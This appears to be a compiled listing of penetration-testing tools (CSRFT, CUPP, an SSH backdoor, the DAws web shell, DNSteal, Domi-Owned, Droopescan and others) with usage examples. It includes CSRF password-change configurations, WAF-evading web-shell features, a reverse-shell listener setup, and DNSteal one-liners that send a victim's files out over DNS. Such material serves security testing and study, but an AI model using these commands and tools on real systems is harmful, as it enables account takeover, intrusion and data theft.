This project has been developed to exploit CSRF Web vulnerabilities and provide you a quick and easy exploitation toolkit. In few words, this is a simple HTTP Server in NodeJS that will communicate with the clients (victims) and send them payload that will be executed using JavaScript.

This has been developed entirely in NodeJS, and configuration files are in JSON format.

* However, there's a tool in Python in utils folder that you can use to automate CSRF exploitation. *

This project allows you to perform PoC (Proof Of Concepts) really easily. Let's see how to get/use it.

How to get/use the tool
First, clone it :
$ git clone git@github.com:PaulSec/CSRFT.git
To make this project work, get the latest Node.js version here . Go in the directory and install all the dependencies:
npm install
Then, launch the server.js :
$ node server.js
Usage will be displayed :
Usage : node server.js <file.json> <port : default 8080>

More information
By default, the server will be launched on the port 8080, so you can access it via : http://0.0.0.0:8080 .
The JSON file must describe your several attack scenarios. It can be wherever you want on your hard drive.
The index page displayed on the browser is accessible via : /views/index.ejs .
You can change it as you want and give the link to your victim.

Different folders : What do they mean ?
The idea is to provide a 'basic' hierarchy (of the folders) for your projects. I made the script quite modular so your configuration files/malicious forms, etc. don't have to be in those folders though. This is more like a good practice/advice for your future projects.

However, here is a little summary of those folders :
  • conf folder : add your JSON configuration file with your configuration.
  • exploits folder : add all your *.html files containing your forms
  • public folder : containing jquery.js and inject.js (script loaded when accessing 0.0.0.0:8080)
  • views folder : index file and exploit template
  • dicos : Folder containing all your dictionnaries for those attacks
  • lib : libs specific for my project (custom ones)
  • utils : folder containing utils such as : csrft_utils.py which will launch CSRFT directly.
  • server.js file - the HTTP server

Configuration file templates

GET Request with special value
Here is a basic example of JSON configuration file that will target www.vulnerable.com This is a special value because the malicious payload is already in the URL/form.
{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "method": "GET", 
            "type_attack": "special_value", 
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=csrfAttacks"
          }
        ]
      }
    ]
  }
}

GET Request with dictionnary attack
Here is a basic example of JSON configuration file. For every entry in the dictionnary file, there will be a HTTP Request done.
{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "file": "./dicos/passwords.txt", 
            "method": "GET", 
            "type_attack": "dico", 
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=<%value%>"
          }
        ]
      }
    ]
  }
}

POST Request with special value attack
{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "form": "/tmp/csrft/form.html", 
            "method": "POST", 
            "type_attack": "special_value"
          }
        ]
      }
    ]
  }
}
The form already includes the malicious payload. So it just has to be executed by the victim.
I hope you understood the principles. I didn't write an example for a POST with dictionnary attack because there will be one in the next section.

Ok but what do Scenario and Attack mean ?
A scenario is composed of attacks. Those attacks can be simultaneous or at different time.
For example, you want to sign the user in and THEN , you want him to perform some unwanted actions. You can specify it in the JSON file.
Let's take an example with both POST and GET Request :
{
    "audit": {
        "name": "DeepSec | Login the admin, give privilege to the Hacker and log him out",

        "scenario": [
            {
                "attack": [
                    {
                        "method": "POST",
                        "type_attack": "dico",
                        "file": "passwords.txt",
                        "form": "deepsec_form_log_user.html",
                        "comment": "attempt to connect the admin with a list of selected passwords"
                    }
                ]
            },
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
                        "url": "http://192.168.56.1/vuln-website/index.php/welcome/upgrade/27",
                        "comment": "then, after the login session, we expect the admin to be logged in, attempt to upgrade our account"
                    }
                ]
            },          
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
                        "url": "http://192.168.56.1/vuln-website/index.php/welcome/logout",
                        "comment": "The final step is to logout the admin"
                    }
                ] 
            }   
        ]
    }
}
You can now define some "steps", different attacks that will be executed in a certain order.

Use cases

A) I want to write my specific JSON configuration file and launch it by hand
Based on the templates which are available, you can easily create your own. If you have any trouble creating it, feel free to contact me and I'll try to help you as much as I can but it shoudn't be this complicated.
Steps to succeed :
1) Create your configuration file, see samples in conf/ folder
2) Add your .html files in the exploits/ folder with the different payloads if the CSRF is POST vulnerable
3) If you want to do Dictionnary attack, add your dictionnary file to the dicos/ folder,
4) Replace the value of the field you want to perform this attack with the token <%value%>
=> either in your urls if GET exploitation, or in the HTML files if POST exploitation.
5) Launch the application : node server.js conf/test.json


B) I want to automate attacks really easily
To do so, I developed a Python script csrft_utils.py in utils folder that will do this for you.
Here are some basic use cases :
* GET parameter with Dictionnary attack : *
$ python csrft_utils.py --url="http://www.vulnerable.com/changePassword.php?newPassword=csvulnerableParameter" --param=newPassword --dico_file="../dicos/passwords.txt"
* POST parameter with Special value attack : *
$ python csrft_utils.py --form=http://website.com/user.php --id=changePassword --param=password password=newPassword --special_value


Download CSRFT

Cupp - Common User Passwords Profiler


The most common form of authentication is the combination of a username and a password or passphrase. If both match values stored within a locally stored table, the user is authenticated for a connection. Password strength is a measure of the difficulty involved in guessing or breaking the password through cryptographic techniques or library-based automated testing of alternate values.

A weak password might be very short or only use alphanumberic characters, making decryption simple. A weak password can also be one that is easily guessed by someone profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.

That is why CUPP has born, and it can be used in situations like legal penetration tests or forensic crime investigations.

Options
Usage: cupp.py [OPTIONS]
    -h      this menu

    -i      Interactive questions for user password profiling

    -w      Use this option to profile existing dictionary,
            or WyD.pl output to make some pwnsauce :)

    -l      Download huge wordlists from repository

    -a      Parse default usernames and passwords directly from Alecto DB.
            Project Alecto uses purified databases of Phenoelit and CIRT which where merged and enhanced.

    -v      Version of the program

Configuration
CUPP has configuration file cupp.cfg with instructions.


Download Cupp

Custom-SSH-Backdoor - SSH Backdoor using Paramiko


Custom ssh backdoor, coded in python using Paramiko.

Paramiko is a Python (2.6+, 3.3+) implementation of the SSHv2 protocol, providing both client and server functionality. While it leverages a Python C extension for low level cryptography (PyCrypto), Paramiko itself is a pure Python interface around SSH networking concepts.


Download Custom-SSH-Backdoor

Damn Vulnerable Web App - PHP/MySQL Training Web Application that is Damn Vulnerable


Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

WARNING!

Damn Vulnerable Web App is damn vulnerable! Do not upload it to your hosting provider's public html folder or any working web server as it will be hacked. I recommend downloading and installing XAMPP onto a local machine inside your LAN which is used solely for testing.

We do not take responsibility for the way in which any one uses Damn Vulnerable Web App (DVWA). We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA it is not our responsibility it is the responsibility of the person/s who uploaded and installed it.


Download Damn Vulnerable Web App

DAws - Advanced Web Shell (Windows/Linux)


There's multiple things that makes DAws better than every Web Shell out there:
  1. Bypasses Disablers; DAws isn't just about using a particular function to get the job done, it uses up to 6 functions if needed, for example, if shell_exec was disabled it would automatically use exec or passthru or system or popen or proc_open instead, same for Downloading a File from a Link, if Curl was disabled then file_get_content is used instead and this Feature is widely used in every section and fucntion of the shell.
  2. Automatic Encoding; DAws randomly and automatically encodes most of your GET and POST data using XOR(Randomized key for every session) + Base64(We created our own Base64 encoding functions instead of using the PHP ones to bypass Disablers) which will allow your shell to Bypass pretty much every WAF out there.
  3. Advanced File Manager; DAws's File Manager contains everything a File Manager needs and even more but the main Feature is that everything is dynamically printed; the permissions of every File and Folder are checked, now, the functions that can be used will be available based on these permissions, this will save time and make life much easier.
  4. Tools: DAws holds bunch of useful tools such as "bpscan" which can identify useable and unblocked ports on the server within few minutes which can later on allow you to go for a bind shell for example.
  5. Everything that can't be used at all will be simply removed so Users do not have to waste their time. We're for example mentioning the execution of c++ scripts when there's no c++ compilers on the server(DAws would have checked for multiple compilers in the first place) in this case, the function would be automatically removed and the User would know.
  6. Supports Windows and Linux.
  7. Openned Source.

Extra Info
  • Eval Form:
    • `include` is being used instead PHP `eval` to bypass Protection Systems.
  • Download from Link - Methods:
    • PHP Curl
    • File_put_content
  • Zip - Methods:
    • Linux:
      • Zip
    • Windows:
      • Vbs Script
  • Shells and Tools:
    • Extra:
      • `nohup`, if installed, is automatically used for background processing.

Download DAws

Dharma - A generation-based, context-free grammar fuzzer

A generation-based, context-free grammar fuzzer.

Requirements

None

Examples

Generate a single test-case.
% ./dharma.py -grammars grammars/webcrypto.dg
Generate a single test case with multiple grammars.
% ./dharma.py -grammars grammars/canvas2d.dg grammars/mediarecorder.dg
Generating test-cases as files.
% ./dharma.py -grammars grammars/webcrypto.dg -storage . -count 5
Generate test-cases, send each over WebSocket to Firefox, observe the process for crashes and bucket them.
% ./dharma.py -server -grammars grammars/canvas2d.dg -template grammars/var/templates/html5/default.html
% ./framboise.py -setup inbound64-release -debug -worker 4 -testcase ~/dev/projects/fuzzers/dharma/grammars/var/index.html
Benchmark the generator.
% time ./dharma.py -grammars grammars/webcrypto.dg -count 10000 > /dev/null

Grammar Cheetsheet

Comment
%%% comment

Controls
%const% name := value

Sections
%section% := value
%section% := variable
%section% := variance

Extension methods
%range%(0-9)
%range%(0.0-9.0)
%range%(a-z)
%range%(!-~)
%range%(0x100-0x200)

%repeat%(+variable+)
%repeat%(+variable+, ", ")

%uri%(path)
%uri%(lookup_key)

%block%(path)

%choice%(foo, "bar", 1)

Assigning values
digit :=
    %range%(0-9)

sign :=
    +
    -

value :=
    +sign+%repeat%(+digit+)

Using values
+value+

Assigning variables
variable :=
    @variable@ = new Foo();

Using variables
value :=
    !variable!.bar();

Referencing values from common.dg
value :=
    attribute=+common:number+

Calling javascript library functions
foo :=
    Random.pick([0,1]);


Download Dharma

Dirs3arch v0.3.0 - HTTP(S) Directory/File Brute Forcer


dirs3arch is a simple command line tool designed to brute force hidden directories and files in websites.

It's written in python3 3 and all thirdparty libraries are included.

Operating Systems supported
  • Windows XP/7/8
  • GNU/Linux
  • MacOSX

Features
  • Multithreaded
  • Keep alive connections
  • Support for multiple extensions (-e|--extensions asp,php)
  • Reporting (plain text, JSON)
  • Detect not found web pages when 404 not found errors are masked (.htaccess, web.config, etc).
  • Recursive brute forcing
  • HTTP(S) proxy support
  • Batch processing (-L)

Examples
  • Scan www.example.com/admin/ to find php files:
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php
  • Scan www.example.com to find asp and aspx files with SSL:
    python3 dirs3arch.py -u https://www.example.com/ -e asp,aspx
  • Scan www.example.com with an alternative dictionary (from DirBuster):
    python3 dirs3arch.py -u http://www.example.com/ -e php -w db/dirbuster/directory-list-2.3-small.txt
  • Scan with HTTP proxy (localhost port 8080):
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php --http-proxy localhost:8080
  • Scan with custom User-Agent and custom header (Referer):
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php --user-agent "My User-Agent" --header "Referer: www.google.com"
  • Scan recursively:
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php -r
  • Scan recursively excluding server-status directory and 200 status codes:
    python3 dirs3arch.py -u http://www.example.com/ -e php -r --exclude-subdir "server-status" --exclude-status 200
  • Scan includes, classes directories in /admin/
    python3 dirs3arch.py -u http://www.example.com/admin/ -e php --scan-subdir "includes, classes"
  • Scan without following HTTP redirects:
    python3 dirs3arch.py -u http://www.example.com/ -e php --no-follow-redirects
  • Scan VHOST "backend" at IP 192.168.1.1:
    python3 dirs3arch.py -u http://backend/ --ip 192.168.1.1
  • Scan www.example.com to find wordpress plugins:
    python3 dirs3arch.py -u http://www.example.com/wordpress/wp-content/plugins/ -e php -w db/wordpress/plugins.txt

  • Batch processing:
    python3 dirs3arch.py -L urllist.txt -e php


Thirdparty code
  • colorama
  • oset
  • urllib3
  • sqlmap

Changelog
  • 0.3.0 - 2015.2.5 Fixed issue3, fixed timeout exception, ported to python33, other bugfixes
  • 0.2.7 - 2014.11.21 Added Url List feature (-L). Changed output. Minor Fixes
  • 0.2.6 - 2014.9.12 Fixed bug when dictionary size is greater than threads count. Fixed URL encoding bug (issue2).
  • 0.2.5 - 2014.9.2 Shows Content-Length in output and reports, added default.conf file (for setting defaults) and report auto save feature added.
  • 0.2.4 - 2014.7.17 Added Windows support, --scan-subdir|--scan-subdirs argument added, --exclude-subdir|--exclude-subdirs added, --header argument added, dirbuster dictionaries added, fixed some concurrency bugs, MVC refactoring
  • 0.2.3 - 2014.7.7 Fixed some bugs, minor refactorings, exclude status switch, "pause/next directory" feature, changed help structure, expaded default dictionary
  • 0.2.2 - 2014.7.2 Fixed some bugs, showing percentage of tested paths and added report generation feature
  • 0.2.1 - 2014.5.1 Fixed some bugs and added recursive option
  • 0.2.0 - 2014.1.31 Initial public release

Discover - Custom bash scripts used to automate various pentesting tasks


For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks.

Download, setup & usage
  • git clone git://github.com/leebaird/discover.git /opt/discover/
  • All scripts must be ran from this location.
  • cd /opt/discover/
  • ./setup.sh
  • ./discover.sh
RECON
1.  Domain
2.  Person
3.  Parse salesforce

SCANNING
4.  Generate target list
5.  CIDR
6.  List
7.  IP or domain

WEB
8.  Open multiple tabs in Iceweasel
9.  Nikto
10. SSL

MISC
11. Crack WiFi
12. Parse XML
13. Start a Metasploit listener
14. Update
15. Exit

RECON

Domain
RECON

1.  Passive
2.  Active
3.  Previous menu
  • Passive combines goofile, goog-mail, goohost, theHarvester, Metasploit, dnsrecon, URLCrazy, Whois and multiple webistes.
  • Active combines Nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute and Whatweb.

Person
RECON

First name:
Last name:
  • Combines info from multiple websites.

Parse salesforce
Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.
Copy the results into a new file.

Enter the location of your list: 
  • Gather names and positions into a clean list.

SCANNING

Generate target list
SCANNING

1.  Local area network
2.  NetBIOS
3.  netdiscover
4.  Ping sweep
5.  Previous menu
  • Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover and nmap pingsweep.

CIDR, List, IP or domain
Type of scan: 

1.  External
2.  Internal
3.  Previous menu
  • External scan will set the nmap source port to 53 and the max-rrt-timeout to 1500ms.
  • Internal scan will set the nmap source port to 88 and the max-rrt-timeout to 500ms.
  • Nmap is used to perform host discovery, port scanning, service enumeration and OS identification.
  • Matching nmap scripts are used for additional enumeration.
  • Matching Metasploit auxiliary modules are also leveraged.

WEB

Open multiple tabs in Icewease
Open multiple tabs in Iceweasel with:

1.  List
2.  Directories from a domain's robot.txt.
3.  Previous menu
  • Use a list containing IPs and/or URLs.
  • Use wget to pull a domain's robot.txt file, then open all of the directories.

Nikto
Run multiple instances of Nikto in parallel.

1.  List of IPs.
2.  List of IP:port.
3.  Previous menu

SSL
Check for SSL certificate issues.

Enter the location of your list: 
  • Use sslscan and sslyze to check for SSL/TLS certificate issues.

MISC

Crack WiFi
  • Crack wireless networks.

Parse XML
Parse XML to CSV.

1.  Burp (Base64)
2.  Nessus
3.  Nexpose
4.  Nmap
5.  Qualys
6.  Previous menu

Start a Metasploit listener
  • Setup a multi/handler with a windows/meterpreter/reverse_tcp payload on port 443.

Update
  • Use to update Kali Linux, Discover scripts, various tools and the locate database.


Download Discover

DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

Below is an image showing an example of how to use:


On the victim machine, you simply can do something like so:
for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done
Support for multiple files
for filename in $(ls); do for b in $(xxd -p $f); do dig +short @server %b.$filename.com; done; done
gzip compression supported
It also supports compression of the file to allow for faster transfer speeds, this can be achieved using the "-z" switch:
python dnsteal.py 127.0.0.1 -z
Then on the victim machine send a Gzipped file like so:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done
or for multiple, gzip compressed files:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$filename.com; done; done


Download DNSteal

Domi-Owned - Tool Used for Compromising IBM/Lotus Domino Servers


Domi-Owned is a tool used for compromising IBM/Lotus Domino servers.
Tested on IBM/Lotus Domino 8.5.2, 8.5.3, 9.0.0, and 9.0.1 running on Windows and Linux.

Usage

A valid username and password is not required unless 'names.nsf' and/or 'webadmin.nsf' requires authentication.

Fingerprinting

Running Domi-Owned with just the
--url
flag will attempt to identify the Domino server version, as well as check if 'names.nsf' and 'webadmin.nsf' requires authentication.
If a username and password is given, Domi-Owned will check to see if that account can access 'names.nsf' and 'webadmin.nsf' with those credentials.

Reverse Bruteforce

To perform a Reverse Bruteforce attack against a Domino server, specify a file containing a list of usernames with
-U
, a password with
-p
, and the
--bruteforce
flag. Domi-Owned will then try to authenticate to 'names.nsf', returning successful accounts.

Dump Hashes

To dump all Domino accounts with a non-empty hash from 'names.nsf', run Domi-Owned with the
--hashdump
flag. This prints the results to the screen and writes them to separate out files depending on the hash type (Domino 5, Domino 6, Domino 8).

Quick Console

The Domino Quick Console is active by default; however, it will not show the command's output. A work around to this problem is to redirect the command output to a file, in this case 'log.txt', that is then displayed as a web page on the Domino server.
If the
--quickconsole
flag is given, Domi-Owned will access the Domino Quick Console, through 'webadmin.nsf', allowing the user to issue native Windows or Linux commands. Domi-Owned will then retrieve the output of the command and display the results in real time, through a command line interpreter. Type
exit
to quit the Quick Console interpreter, which will also delete the 'log.txt' output file.

Examples

Fingerprint Domino server

python domi-owned.py --url http://domino-server.com

Preform a reverse bruteforce attack

python domi-owned.py --url http://domino-server.com -U ./usernames.txt -p password --bruteforce

Dump Domino account hashes

python domi-owned.py --url http://domino-server.com -u user -p password --hashdump

Interact with the Domino Quick Console

python domi-owned.py --url http://domino-server.com -u user -p password --quickconsole


Download Domi-Owned

Double the bang for your buck with Acunetix Vulnerability Scanner


Acunetix have announced that they are extending their current free offering of the network security scan, part of their cloud-based web and network vulnerability scanner. Those signing up for a trial of the online version of Acunetix vulnerability scanner will now be able to scan their perimeter servers for network security issues on up to 3 targets with no expiry.

In addition, existing Acunetix customers will also be able to double up on their current license-based quota of scan targets by adding the same amount of network scans. i.e a 25 scan target license can now make use of an extra 25 network-only scan targets for free.

An analysis of scans performed over the past year following the launch of Acunetix Vulnerability Scanner (online version) show that on average 50% of the targets scanned have a medium or high network security vulnerability. It’s worrying that in the current cybersecurity climate, network devices remain vulnerable to attack. The repercussions of a vulnerable network are catastrophic as seen in some recent, well publicised Lizard Squad attacks, the black hat hacking group, mainly known for their claims of DoS attacks.

“Acunetix secure the websites of some of the biggest global enterprises, and with our online vulnerability scanner we are not only bringing this technology within reach of many more businesses but we are also providing free network security scanning technology to aid smaller companies secure their network,” said Nick Galea, CEO of Acunetix.

How Acunetix keeps perimeter servers secure

A network security scan checks the perimeter servers, locating any vulnerabilities in the operating system, server software, network services and protocols. Acunetix network security scan uses the OpenVAS database of network vulnerabilities and scans for more than 35,000 network level vulnerabilities. A network scan is where vulnerabilities such as Shellshock, Heartbleed and POODLE are detected, vulnerabilities which continue to plague not only web servers but also a large percentage of other network servers. A network scan will also:
  • Detect misconfigurations and vulnerabilities in OS, server applications, network services, and protocols
  • Assess security of detected devices (routers, hardware firewalls, switches and printers)
  • Scan for trojans, backdoors, rootkits, and other malware that can be detected remotely
  • Test for weak passwords on FTP, IMAP, SQL servers, POP3, Socks, SSH, Telnet
  • Check for DNS server vulnerabilities such as Open Zone Transfer, Open Recursion and Cache Poisoning
  • Test FTP access such as anonymous access potential and a list of writable FTP directories
  • Check for badly configured Proxy Servers, weak SNMP Community Strings, weak SSL ciphers and many other security weaknesses.

Register for a free trial and start scanning http://www.acunetix.com/free-network-security-scanner/ 

About Acunetix

Acunetix is the market leader in web application security technology, founded to combat the alarming rise in web attacks. Its products and technologies are the result of a decade of work by a team of highly experienced security developers. Acunetix’ customers include the U.S. Army, KPMG, Adidas and Fujitsu. More information can be found at www.acunetix.com.


Droopescan - Scanner to identify issues with several CMSs, mainly Drupal & Silverstripe


A plugin-based scanner that aids security researchers in identifying issues with several CMS:
  • Drupal.
  • SilverStripe.
Partial functionality for:
  • Wordpress.
  • Joomla.
computer:~/droopescan$ droopescan scan drupal -u http://example.org/ -t 8
[+] No themes found.

[+] Possible interesting urls found:
    Default changelog file - https://www.example.org/CHANGELOG.txt
    Default admin - https://www.example.org/user/login

[+] Possible version(s):
    7.34

[+] Plugins found:
    views https://www.example.org/sites/all/modules/views/
        https://www.example.org/sites/all/modules/views/README.txt
        https://www.example.org/sites/all/modules/views/LICENSE.txt
    token https://www.example.org/sites/all/modules/token/
        https://www.example.org/sites/all/modules/token/README.txt
        https://www.example.org/sites/all/modules/token/LICENSE.txt
    pathauto https://www.example.org/sites/all/modules/pathauto/
        https://www.example.org/sites/all/modules/pathauto/README.txt
        https://www.example.org/sites/all/modules/pathauto/LICENSE.txt
        https://www.example.org/sites/all/modules/pathauto/API.txt
    libraries https://www.example.org/sites/all/modules/libraries/
        https://www.example.org/sites/all/modules/libraries/CHANGELOG.txt
        https://www.example.org/sites/all/modules/libraries/README.txt
        https://www.example.org/sites/all/modules/libraries/LICENSE.txt
    entity https://www.example.org/sites/all/modules/entity/
        https://www.example.org/sites/all/modules/entity/README.txt
        https://www.example.org/sites/all/modules/entity/LICENSE.txt
    google_analytics https://www.example.org/sites/all/modules/google_analytics/
        https://www.example.org/sites/all/modules/google_analytics/README.txt
        https://www.example.org/sites/all/modules/google_analytics/LICENSE.txt
    ctools https://www.example.org/sites/all/modules/ctools/
        https://www.example.org/sites/all/modules/ctools/CHANGELOG.txt
        https://www.example.org/sites/all/modules/ctools/LICENSE.txt
        https://www.example.org/sites/all/modules/ctools/API.txt
    features https://www.example.org/sites/all/modules/features/
        https://www.example.org/sites/all/modules/features/CHANGELOG.txt
        https://www.example.org/sites/all/modules/features/README.txt
        https://www.example.org/sites/all/modules/features/LICENSE.txt
        https://www.example.org/sites/all/modules/features/API.txt
    [... snip for README ...]

[+] Scan finished (0:04:59.502427 elapsed)
You can get a full list of options by running:
droopescan --help
droopescan scan --help

Why not X?

Because droopescan:
  • is fast
  • is stable
  • is up to date
  • allows simultaneous scanning of multiple sites
  • is 100% python
Installation

Installation is easy using pip:
apt-get install python-pip
pip install droopescan

Manual installation is as follows:
git clone https://github.com/droope/droopescan.git
cd droopescan
pip install -r requirements.txt
droopescan scan --help
The master branch corresponds to the latest release (what is in pypi). Development branch is unstable and all pull requests must be made against it. More notes regarding installation can be found here.

Features

Scan types.

Droopescan aims to be the most accurate by default, while not overloading the target server due to excessive concurrent requests. Due to this, by default, a large number of requests will be made with four threads; change these settings by using the --number and --threads arguments respectively.

This tool is able to perform four kinds of tests. By default all tests are ran, but you can specify one of the following with the -e or --enumerate flag:
  • p -- Plugin checks: Performs several thousand HTTP requests and returns a listing of all plugins found to be installed in the target host.
  • t -- Theme checks: As above, but for themes.
  • v -- Version checks: Downloads several files and, based on the checksums of these files, returns a list of all possible versions.
  • i -- Interesting url checks: Checks for interesting urls (admin panels, readme files, etc.)
More notes regarding scanning can be found here.

Target specification

You can specify a particular host to scan by passing the -u or --url parameter:
    droopescan scan drupal -u example.org
You can also omit the drupal argument. This will trigger “CMS identification”, like so:
    droopescan scan -u example.org
Multiple URLs may be scanned utilising the -U or --url-file parameter. This parameter should be set to the path of a file which contains a list of URLs.
    droopescan scan drupal -U list_of_urls.txt
The drupal parameter may also be ommited in this example. For each site, it will make several GET requests in order to perform CMS identification, and if the site is deemed to be a supported CMS, it is scanned and added to the output list. This can be useful, for example, to run droopescan across all your organisation's sites.
    droopescan scan -U list_of_urls.txt
The code block below contains an example list of URLs, one per line:
http://localhost/drupal/6.0/
http://localhost/drupal/6.1/
http://localhost/drupal/6.10/
http://localhost/drupal/6.11/
http://localhost/drupal/6.12/
A file containing URLs and a value to override the default host header with separated by tabs or spaces is also OK for URL files. This can be handy when conducting a scan through a large range of hosts and you want to prevent unnecessary DNS queries. To clarify, an example below:
192.168.1.1 example.org
http://192.168.1.1/ example.org
http://192.168.1.2/drupal/  example.org
It is quite tempting to test whether the scanner works for a particular CMS by scanning the official site (e.g. wordpress.org for wordpress), but the official sites rarely run vainilla installations of their respective CMS or do unorthodox things. For example, wordpress.org runs the bleeding edge version of wordpress, which will not be identified as wordpress by droopescan at all because the checksums do not match any known wordpress version.

Authentication

The application fully supports .netrc files and http_proxy environment variables.

You can set the http_proxy and https_proxy variables. These allow you to set a parent HTTP proxy, in which you can handle more complex types of authentication (e.g. Fiddler, ZAP, Burp)
export http_proxy='user:password@localhost:8080'
export https_proxy='user:password@localhost:8080'
droopescan scan drupal --url http://localhost/drupal
Another option is to use a .netrc file for basic authentication. An example ~/.netrc file could look as follows:
machine secret.google.com
    login admin@google.com
    password Winter01
WARNING: By design, to allow intercepting proxies and the testing of applications with bad SSL, droopescan allows self-signed or otherwise invalid certificates. ˙ ͜ʟ˙

Output

This application supports both "standard output", meant for human consumption, or JSON, which is more suitable for machine consumption. This output is stable between major versions.
This can be controlled with the --output flag. Some sample JSON output would look as follows (minus the excessive whitespace):
{
  "themes": {
    "is_empty": true,
    "finds": [

    ]
  },
  "interesting urls": {
    "is_empty": false,
    "finds": [
      {
        "url": "https:\/\/www.drupal.org\/CHANGELOG.txt",
        "description": "Default changelog file."
      },
      {
        "url": "https:\/\/www.drupal.org\/user\/login",
        "description": "Default admin."
      }
    ]
  },
  "version": {
    "is_empty": false,
    "finds": [
      "7.29",
      "7.30",
      "7.31"
    ]
  },
  "plugins": {
    "is_empty": false,
    "finds": [
      {
        "url": "https:\/\/www.drupal.org\/sites\/all\/modules\/views\/",
        "name": "views"
      },
      [...snip...]
    ]
  }
}
Some attributes might be missing from the JSON object if parts of the scan are not ran.
This is how multi-site output looks like; each line contains a valid JSON object as shown above.

    $ droopescan scan drupal -U six_and_above.txt -e v
    {"host": "http://localhost/drupal-7.6/", "version": {"is_empty": false, "finds": ["7.6"]}}
    {"host": "http://localhost/drupal-7.7/", "version": {"is_empty": false, "finds": ["7.7"]}}
    {"host": "http://localhost/drupal-7.8/", "version": {"is_empty": false, "finds": ["7.8"]}}
    {"host": "http://localhost/drupal-7.9/", "version": {"is_empty": false, "finds": ["7.9"]}}
    {"host": "http://localhost/drupal-7.10/", "version": {"is_empty": false, "finds": ["7.10"]}}
    {"host": "http://localhost/drupal-7.11/", "version": {"is_empty": false, "finds": ["7.11"]}}
    {"host": "http://localhost/drupal-7.12/", "version": {"is_empty": false, "finds": ["7.12"]}}
    {"host": "http://localhost/drupal-7.13/", "version": {"is_empty": false, "finds": ["7.13"]}}
    {"host": "http://localhost/drupal-7.14/", "version": {"is_empty": false, "finds": ["7.14"]}}
    {"host": "http://localhost/drupal-7.15/", "version": {"is_empty": false, "finds": ["7.15"]}}
    {"host": "http://localhost/drupal-7.16/", "version": {"is_empty": false, "finds": ["7.16"]}}
    {"host": "http://localhost/drupal-7.17/", "version": {"is_empty": false, "finds": ["7.17"]}}
    {"host": "http://localhost/drupal-7.18/", "version": {"is_empty": false, "finds": ["7.18"]}}
    {"host": "http://localhost/drupal-7.19/", "version": {"is_empty": false, "finds": ["7.19"]}}
    {"host": "http://localhost/drupal-7.20/", "version": {"is_empty": false, "finds": ["7.20"]}}
    {"host": "http://localhost/drupal-7.21/", "version": {"is_empty": false, "finds": ["7.21"]}}
    {"host": "http://localhost/drupal-7.22/", "version": {"is_empty": false, "finds": ["7.22"]}}
    {"host": "http://localhost/drupal-7.23/", "version": {"is_empty": false, "finds": ["7.23"]}}
    {"host": "http://localhost/drupal-7.24/", "version": {"is_empty": false, "finds": ["7.24"]}}
    {"host": "http://localhost/drupal-7.25/", "version": {"is_empty": false, "finds": ["7.25"]}}
    {"host": "http://localhost/drupal-7.26/", "version": {"is_empty": false, "finds": ["7.26"]}}
    {"host": "http://localhost/drupal-7.27/", "version": {"is_empty": false, "finds": ["7.27"]}}
    {"host": "http://localhost/drupal-7.28/", "version": {"is_empty": false, "finds": ["7.28"]}}
    {"host": "http://localhost/drupal-7.29/", "version": {"is_empty": false, "finds": ["7.29"]}}
    {"host": "http://localhost/drupal-7.30/", "version": {"is_empty": false, "finds": ["7.30"]}}
    {"host": "http://localhost/drupal-7.31/", "version": {"is_empty": false, "finds": ["7.31"]}}
    {"host": "http://localhost/drupal-7.32/", "version": {"is_empty": false, "finds": ["7.32"]}}
    {"host": "http://localhost/drupal-7.33/", "version": {"is_empty": false, "finds": ["7.33"]}}
    {"host": "http://localhost/drupal-7.34/", "version": {"is_empty": false, "finds": ["7.34"]}}


Download Droopescan

Dshell - Network Forensic Analysis Framework


An extensible network forensic analysis framework. Enables rapid development of plugins to support the dissection of network packet captures.

Key features:
  • Robust stream reassembly
  • IPv4 and IPv6 support
  • Custom output handlers
  • Chainable decoders

Prerequisites

Installation
  1. Install all of the necessary Python modules listed above. Many of them are available via pip and/or apt-get. Pygeoip is not yet available as a package and must be installed with pip or manually. All except dpkt are available with pip.
    1. sudo apt-get install python-crypto python-dpkt python-ipy python-pypcap
    2. sudo pip install pygeoip
  2. Configure pygeoip by moving the MaxMind data files (GeoIP.dat, GeoIPv6.dat, GeoIPASNum.dat, GeoIPASNumv6.dat) to /share/GeoIP/
  3. Run make. This will build Dshell.
  4. Run ./dshell. This is Dshell. If you get a Dshell> prompt, you're good to go!

Basic usage
  • decode -l
    • This will list all available decoders alongside basic information about them
  • decode -h
    • Show generic command-line flags available to most decoders
  • decode -d <decoder>
    • Display information about a decoder, including available command-line flags
  • decode -d <decoder> <pcap>
    • Run the selected decoder on a pcap file

Usage Examples

Showing DNS lookups in sample traffic
Dshell> decode -d dns ~/pcap/dns.cap
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 39867 PTR? 66.192.9.104 / PTR: 66-192-9-104.gen.twtelecom.net **
